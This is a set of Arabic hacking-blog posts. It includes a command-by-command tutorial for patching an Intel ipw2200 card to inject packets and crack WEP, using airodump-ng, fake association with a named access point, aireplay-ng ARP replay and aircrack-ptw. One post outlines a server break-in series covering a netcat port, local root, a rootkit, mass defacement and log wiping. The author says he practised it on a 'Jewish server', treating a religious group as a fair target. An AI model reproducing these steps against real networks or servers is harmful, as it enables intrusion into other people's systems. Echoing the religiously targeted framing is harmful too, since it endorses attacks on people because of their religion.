br0ken rlz

السلام عليكم ورحمه الله وبركاته ,, درسنا اليوم عن طريقة جعل أحد كروت انتل يعمل عليه اﻻنجكشن جميع كروت أنتل ﻻ تستطيع عن طريقها عمل انجكشن لزيادة الباكيت في كسر تشفير WEP , كان الحل للجميع أنه يشتري كرت جديد يدعم اﻻنجكشن وطبعاً يعتمد على chipset , في هذا الدرس سوف أشرح طريقة جعل أحد كروت انتل تدعم اﻻنجكشن والكرت هوه ipw2200 ,, نبدا على بركة لله
1/ نحتاج أن ننصب بعض الباكج الضرورية طبعاً تستطيع أن تنصبها حسب مدير الحزم الخاص بتوزيعتك

sudo apt-get install build-essential
sudo apt-get install linux-source
sudo apt-get install linux-headers-`uname -r`
sudo apt-get install sharutils

اﻻن نطبق اﻻمر التالي لعمل رابط لمجلد headers في المسار /usr/src/linux

sudo ln -s /usr/src/linux-headers-`uname -r`/ /usr/src/linux

ثم نطبق اﻷمر ويجب أن تكون مثل نتيجة اﻷمر

root@myrul3z:/usr/src# ls -l /usr/src/linux
lrwxrwxrwx 1 root src 41 2007-12-15 19:44 /usr/src/linux -> /usr/src/linux-headers-2.6.20-15-generic/

2/ لجعل كرت انتل يعمل عليه اﻻنجكشن يجب علينا تنصيب الباتش ضروري جداً والباتش يتركب اولاً على التعريف ثم تقوم بتنصيبه إصدار الباتش يوجد ﻷصدارات قديمة ولكن أخر إصدار لتعريف كرت ipw2200 لم ينزل حتى اﻻن وهوه ipw2200 1.2.2 إصدار الباتش الذي سوف نركبه سوف يكون اصداره 1.2.1 وأيضاً تعريف ieee80211 1.2.17 إضافة للباتش 1.2.1 لذا سوف نقوم بتحميل التالي

1-2/ تحميل تعريف ipw2200 version 1.2.1 الرابط http://ipw2200.sourceforge.net/downloads.php
2-2- / تحميل تعريف ieee80211 version 1.2.17 الرابط http://ieee80211.sourceforge.net/#downloads
3-2 / تحميل الباتش لتعريف ipw2200 version 1.2.1 الرابط http://www.box.net/shared/j3qvacbbmb
4-2 / إنشاء مجلد ووضع فيه جميع الملفات التي تم تحميلها
5-2/ فك الضغط عن الملفات التي تم تحميلها

tar -xvf ipw2200-1.2.1-inject_patch.tar.gz
tar -xvf ipw2200-*.tgz
tar -xvf ieee80211-*.tgz

6-2/ تطبيق الباتش على التعريف

patch -p0 < ipw2200-1.2.1-inject.patch
patch -p0 < ipw2200-1.2.1-inject_Makefile.patch

7-2/ تنصيب تعريف ieee80211
ملاحظة قبل التنصيب يجب علينا حذف الاصدار القديم وتنصيب اﻻصدار 1.2.17

root@myrul3z:/home/br0ken/injection# cd ieee80211-1.2.17
root@myrul3z:/home/br0ken/injection/ieee80211-1.2.17# sh remove-old

بعد تنفيذ اﻷمر sh remove-old لحذف النسخة سوف يسألك بعض اﻷسئلة ضع جميعها y

root@myrul3z:/home/br0ken/injection/ieee80211-1.2.17# make
root@myrul3z:/home/br0ken/injection/ieee80211-1.2.17# make install

8-2/ تنصيب تعريف ipw2200
ملاحظة قبل التصيب يجب علينا حذف الاصدار القديم وتنصيب اﻻصدار 1.2.1

root@myrul3z:/home/br0ken/injection# cd ipw2200-1.2.1
root@myrul3z:/home/br0ken/injection/ipw2200-1.2.1# sh remove-old

بعد تنفيذ اﻷمر sh remove-old لحذف النسخة سوف يسألك بعض اﻷسئلة ضع جميعها y

root@myrul3z:/home/br0ken/injection/ipw2200-1.2.1# make
root@myrul3z:/home/br0ken/injection/ipw2200-1.2.1# make install

9-2/ عمل ريستارت للجهاز

10-2/ التحقق من اﻻصدار لـ ieee80211 and ipw2200

root@myrul3z:/home/br0ken# dmesg | grep ipw
[ 19.940000] ipw2200: Intel(R) PRO/Wireless 2200/2915 Network Driver, 1.2.1dmprq
[ 19.940000] ipw2200: Copyright(c) 2003-2006 Intel Corporation
[ 20.092000] ipw2200: Detected Intel PRO/Wireless 2200BG Network Connection
[ 20.408000] ipw2200: Radio Frequency Kill Switch is On:
[ 20.408000] ipw2200: Detected geography ZZM (11 802.11bg channels, 0 802.11a channels)

root@myrul3z:/home/br0ken# dmesg | grep ieee
[ 19.768000] ieee80211_crypt: registered algorithm ‘NULL’
[ 19.824000] ieee80211: 802.11 data/management/control stack, 1.2.17
[ 19.824000] ieee80211: Copyright (C) 2004-2005 Intel Corporation <jketreno@linux.intel.com>

3/ تحميل الدرايف الجديد [ Load] وإنشاء انترفيس بأسم rtap0
راح يكون rtap0 للـ listening و eth* الـ injecting

sudo rmmod ipw2200
sudo modprobe ipw2200 rtap_iface=1
sudo ifconfig rtap0 up

4/ طريقة الهجوم بكرت ipw2200
أي كرت يدعم packets injection راح تقدر تستخدم جميع طرق الهجوم الموجودة في aireplay-ng لكن في كرت انتل مع patch injection سوف تكون محدودة على طرق معينة فقط يوجد طرق ﻻ تعمل مع الكرت الطرق التي تعمل مع كرت انتل هي 3 طرق فقط أما باقي الطرق ﻻ تعمل والله أعلم

interactive
arpreplay
chopchop

4-1/ سوف أشرح أحد طرق الهجوم لسبب ما أنها تختلف اختلاف بسيط عن الكروت التي تدعم packet injection من اﻷساس التقاط الباكيت باﻷداة airodump-ng وراح نستخدم النترفيس rtap0

airodump-ng -c 1 –bssid MAC-AP -w dump rtap0

4-2/ عمل fake للاكسس بوينت هذي الخطوة مهمة ﻷنه عشان تقدر ترسل arp request للاكسس بوينت ويقبلها ﻻزم الكلاينت يكون شابك associate وراح نستخدم الماك ادرس تبعه لذلك راح نسوي fake ونستخدم الماك ادرس الخاص بكرتنا

iwconfig eth1 essid SpeedTouch433793 channel 1 key s:fakekey mode managed

4-3/ استخدم طريقة الهجوم arpreplay ﻷرسال arp request للاكسس بوينت لزيادة الباكيت وكسر تشفير WEP

aireplay-ng -3 -b MAC-AP -h MAC-Client -i rtap0 eth1

وراح تشاهد الباكيت في ازدياد بشكل خيالي ,,, عملت فيديو تطبيقي للانجكشن عبر كرت انتل
واستخدمت فيه arpreplay attack لتحميل الفيديو اضغط هنا
وبكذا الواحد يوفر فلوسه لشراء كرت يدعم packet injection ويستخدم كرت انتل المدمج مع جهازه
إن شاء الله الدرس يكون مفيد لكم إخواني
أخوكم br0ken rlz

السلام عليكم ورحمه الله وبركاته ,,, WEP Wired Equivalent Privacy هوه البروتكول اﻻفتراضي المستخدم في تأمين الشبكة اللاسلكية يستخدم خوارزمية تشفير تسمى RC4 لتشفير البيانات المنتقلة عبر الهواء ويستخدم عادة مفتاح تشفير واحد طول المفتاح 40 أو 104 بت ,, قام ثلاثة شباب ألمانيين [ ايرك , اندري , رالف فيلب ] يدرسون في جامعة technical university Darmstadt in Germany ببرمجة تولز aircrack-ptw بلغة السي
http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/

aircrack-ptw
هي تولز لكسر مفتاح WEP ويستخدم طريقة خاصة لكسر 104-bit WEP في أقل من 60 ثانية بأستخدام aircrack-ptw , وبالامكان كسر 104 بت بنسبة 50% بأستخدام 40,000 باكيت ملتقطة وبنسبة 85% بأستخدام 60,000 باكيت وبنسبة 95% بأستخدام 85,000 باكيت

if y0 using aircrack-ng
64 bit = need 250,000 packets to crack WEP
128 bit = need 500,000 packets to crack WEP

if y0 using aircrack-ptw
64 bit = need 20,000 packets to crack WEP
128 bit = need 85,000 packets to crack WEP

هل تلاحظون الفرق الكبير بينهم ؟ فعلا شي عجيب ولغة قوية c++ ,, طريقة تنصيب aircrack-ptw , نسحب التولز باﻷمر wget

wget http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/download/aircrack-ptw-1.0.0.tar.gz

ثم نفك الضغط باﻷمر tar

tar zxvf aircrack-ptw-1.0.0.tar.gz

ثم ندخل على مجلد التولز باﻷمر cd

cd aircrack-ptw-1.0.0

قبل تطبيق اﻷمر make لي وقفه هنا

لمستخدمين توزيعة Debian/ubuntu يحتاجون ينصبوا باكج libpcap0.8-dev

sudo apt-get install libpcap0.8-dev

أما بالنسبة لمستخدمين توزيعة Fedora فنقوم بالتعديل على الملف Makefile ,, طبعاً تحرره بأي برنامج محرر

gedit Makefile

ثم ننقل كلمة -lpcap إلى نهاية سطر gcc في كل السطرين ,, ويصبح هكذا بعد التعديل

gcc -o aircrack-ptw -Wall -fomit-frame-pointer -O3 aircrack-ptw.c aircrack-ptw-lib.c -lpcap
gcc -o attacksim -Wall -fomit-frame-pointer -O3 attacksim.c aircrack-ptw-lib.c -lpcap

ثم نحفظ التغيرات ونغلق الملف , بعدها نطبق اﻷمر make لتنصيب التولز

make

اﻻن عشان تشغل التولز ﻻزم تدخل على الفولدر ثم تطبقه يعني مشوار شوي لذلك الحل هوه نقوم بنسخ الملف إلى المسار /usr/sbin وبكذا نرتاح نشغله بدون دخول على المجلد

root@myrul3z:/home/br0ken/aircrack-ptw-1.0.0# cp aircrack-ptw /usr/sbin

ونشغل التولز باﻷمر aircrack-ptw

root@myrul3z:~# aircrack-ptw
This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
usage: aircrack-ptw <capturefile>

اﻻن بعد ماتجمع تقريباً 20,000 باكيت جرب تعمل كراك wep

root@myrul3z:~# aircrack-ptw dump-01.cap

ملاحظات مهمة notes :

1- aircrack-ptw يتطلب وجود aircrack-ng suite of tools

(for ARP re-injection (aireplay-ng) and data capture (airodump-ng

2- عندما تبدا في استخدام airodump-ng ﻻ تستخدم –ivs

3- aircrack-ptw حالياً يعمل فقط مع ARP requests and ARP responses

عملت فيديو تطبيقي لعمل اﻻداه وفعاليتها ,, استخدمت فيها fragmentation attack + aircrack-ptw
لتحميل الفيديو اضغط هنا ,, رابط إضافي اضغط هنا لتحميل

أتمنى أن يعجبكم الشرح أخوكم بروكن

السلام عليكم ورحمه الله وبركاته ,, كتبت قبل سنة وتحديداً في تاريخ 30 / 9 / 1427 هـ الموافق 23-10-2006 هذا الدرس وكان أول درس حقيقي لي وجعلته على شكل أجزاء وكل جزء مربوط بالجزء ,الذي قبله , تطبيقي كان على سيرفر يهودي الدرس أعتبره مبتدئ جداً ﻻنه مجرد نقطة في بحر ,هذا العلم لكن أغلب المبتدئين يعتبرونه متقدم هذا في نظرهم فقط أما في نظري أعتبره مبتدئ ,مواقع ومنتديات كثيرة نقلت الدرس البعض منها حفظت الحقوق والبعض اﻵخر للاسف ﻻ ,لكن ماتهمني الحقوق قدر مايهمني الفائدة لي وللآخرين وأنا لست مسؤول عن تطبيق الدرس ,على سيرفر عربي مسلم ﻻ حول له وﻻ قوة , فالهكينق سلاح ذو حدين , الدرس راح يفيد كل صاحب سيرفر أكثر من غيره ﻷنه راح يفتح عيونه على أشياء يجهلها أو لم تخطر على باله أو لم يهتم بها , وراح يفيدكم كثير سوى من ناحية الحماية أو اﻻختراق ﻻنك إذا عرفت كيف تخترق سيرفرك سوف تعرف كيف تحميه ,,, الدرس يتكون من أربعة أجزاء :

الجزء الأول/

فتح بورت في السيرفر والاتصال عن طريق النت كات

الجزء الثاني /

أخذ روت على الســيرفــر عن طريق لوكل السي بنل الجديد

الجزء الثالث /

تركيب روت كيت لضمان رجوعك للسيرفر

الجزء الرابع /

عمل ماس ديفيس ومسح آثارك على السيرفر

وأشكر أخي وصديقي الطارق صاحب مكتبة الطارق لرفعه الدروس على موقعه ويعلم الله أني ,أحبك في لله أخي الطارق فكلمة شكر لن توفيك حقك أبداً ,,, أتمنى أن تستفيدوا منه في الخير وللمعرفة وليس لاختراق الناس بدون سب ,,أخوكم بروكن

السلام عليكم ورحمه الله وبركاته ,,انتهيت من كتابة درسي الخاص بالوايرليس في رمضان وأخذ وقت كثير مني والسبب مني ﻷني أكتب في اليوم من سطر إلى سطرين وبعض اﻷيام ﻻ أكتب شي ﻻ أجد وقت لتفرغ له ,لإنشغالي في مشروع لتحديث الشبكة في عملي لكن أحمد الله أني انتهيت منه وأعجب الكثيرين وأشكر أخوي الطارق صاحب موقع مكتبة الطارق على تصميمه للكتاب وإخراجه بشكل رائع , الدرس سوف يفيدكم سوى من ناحية اﻻختراق أو الحماية ﻷنك إذا عرفت كيف تخترق شبكتك سوف تعرف كيف تحميها ,  يتناول الكتاب موضوعات :

أولاً : مرجعاً لاختراق الشبكات اللاسلكية الـ Wireless .

ثانياً : لدارسي الشبكات والمهتمين بالأمن ومواضيع السكيورتي .

ثالثاً : ليتعلموا أصحاب محلات الكافي نت , والشركات المزودة لخدمة الشبكات اللاسلكية أن شبكتهم المحمية ممكن اختراقها ولا يوجد هناك مستحيل .

لتحميل الكتاب

http://www.t0010.com/books/open.php?cat=4&book=203

وللعلم الدرس مزود بشرح فيديو لطرق الهجوم التي شرحتها تجدونها روابطها في نهاية الكتاب أتمنى أن تستفيدوا منه في الخير وللمعرفة وليس لاختراق الناس بدون سبب ,,, أخوكم متعب